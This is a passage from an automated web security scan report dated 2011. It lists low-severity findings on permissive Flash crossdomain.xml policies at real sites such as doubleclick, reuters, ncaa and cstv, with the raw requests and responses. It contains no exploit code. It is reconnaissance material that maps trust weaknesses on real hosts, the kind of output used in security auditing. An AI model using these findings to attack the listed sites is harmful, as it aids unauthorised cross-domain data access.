<allow-access-from domain="*.espnmediaflo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="host-a.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-d.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host.staging.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.l4b3l.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.wknewyork.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.wknyc.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yournbadestination.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.nba.com" to-ports="*"/>
   <allow-access-from domain="hive.cachefly.net" to-ports="*" />
...[SNIP]...
<allow-access-from domain="espn.nanogaming.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.dolimg.com" to-ports="*"/>
   <allow-access-from domain="*.yieldmanager.com" to-ports="*"/>
   <allow-access-from domain="*.akqa.com" to-ports="*"/>
   <allow-access-from domain="*.designbloxlive.com" to-ports="*"/>
   <allow-access-from domain="ds.serving-sys.com" to-ports="*"/>
   <allow-access-from domain="*.arndev.com" to-ports="*"/>
   <allow-access-from domain="nascar.blitzagency.com" to-ports="*"/>
   <allow-access-from domain="*.abc.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.vml.com" to-ports="*"/>
   <allow-access-from domain="*.vmltest.com" to-ports="*"/>
   <allow-access-from domain="*.vmldev.com" to-ports="*"/>
   <allow-access-from domain="*.vmlstage.com" to-ports="*"/>
   <allow-access-from domain="*.collegegameday.com" to-ports="*"/>
   <allow-access-from domain="dev.sarkissianmason.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.streamtheworld.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.adsfac.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.google.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.youtube.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ytimg.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.client-projects.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="173.45.231.98" to-ports="*"/>
   <allow-access-from domain="abcpreview.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.pseudosisu.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.tv" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="redinter.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.soapnet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="sn.soapnet.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="jayski.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.squarewave.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="wpc.0C74.edgecastcdn.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="votecollector.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espndb.com"/>
   <allow-access-from domain="*.foxtel.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verizon.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verizon.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.espn.pvt" to-ports="*"/>
   <allow-access-from domain="*.xif.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.miclients.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="adimages.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.questionmarket.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="all360poker.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adinterax.com" />
   <allow-access-from domain="infinitidev.tbwachiatdev.com" />
   <allow-access-from domain="*.coachespicmixerterms.com" />
   <allow-access-from domain="*.coachpicmixerprivacypolicy.com" />
   <allow-access-from domain="*.ooyala.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.playdom.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sportsR.us" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mycorplink.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.fanflex.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="preview.espncreativeworks.com" to-ports="*" secure="false"/>
...[SNIP]...

6.89. http://friendfeed.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://friendfeed.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: friendfeed.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 321
Vary: Cookie
Server: FriendFeedServer/0.1
Etag: "d69a789b2865b15041af5e97e97c7b933b34666a"
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<cross-domain-policy xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*.friendfeed.com"/>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...

6.90. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:16:24 GMT
Expires: Sun, 04 Sep 2011 23:16:24 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 7573
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.91. http://grfx.cstv.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://grfx.cstv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:29 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.92. http://ocp.ncaa.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ocp.ncaa.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ocp.ncaa.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7358
Keep-Alive: timeout=15, max=970
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...
<allow-access-from domain="*.dev.cbssports.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.g.doubleclick.net"/>
<allow-access-from domain="*.liverail.com"/>
...[SNIP]...

6.93. http://onlyfans.cstv.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://onlyfans.cstv.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: onlyfans.cstv.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:34 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Accept-Ranges: bytes
Content-Length: 909
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.94. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:45:00 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.95. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sat, 03 Sep 2011 23:17:24 GMT
Expires: Sun, 04 Sep 2011 23:17:24 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 6476
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

6.96. http://picasaweb.google.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: picasaweb.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 01:23:13 GMT
Date: Sun, 04 Sep 2011 01:23:13 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.ru" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.co.th" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.bg" />
<allow-access-from domain="*.google.hr" />
<allow-access-from domain="*.google.cz" />
<allow-access-from domain="*.google.gr" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.hu" />
<allow-access-from domain="*.google.co.id" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.google.si" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.fr" />
...[SNIP]...

6.97. http://portfolio.us.reuters.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://portfolio.us.reuters.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: portfolio.us.reuters.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:23:24 GMT
Content-Length: 736
Content-Type: text/xml
Last-Modified: Tue, 24 Nov 2009 19:47:55 GMT
Accept-Ranges: bytes
ETag: "f8f85b43f6dca1:efb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" />
<al
...[SNIP]...
<allow-access-from domain="reuters.com" />
...[SNIP]...
<allow-access-from domain="reuters.com" />
...[SNIP]...
<allow-access-from domain="usa.qa.reuters.com" />
<allow-access-from domain="uk.qa.reuters.com" />
<allow-access-from domain="jp.qa.reuters.com" />
...[SNIP]...

6.98. http://pubads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 04 Sep 2011 00:13:02 GMT
Expires: Mon, 05 Sep 2011 00:13:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 4222
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
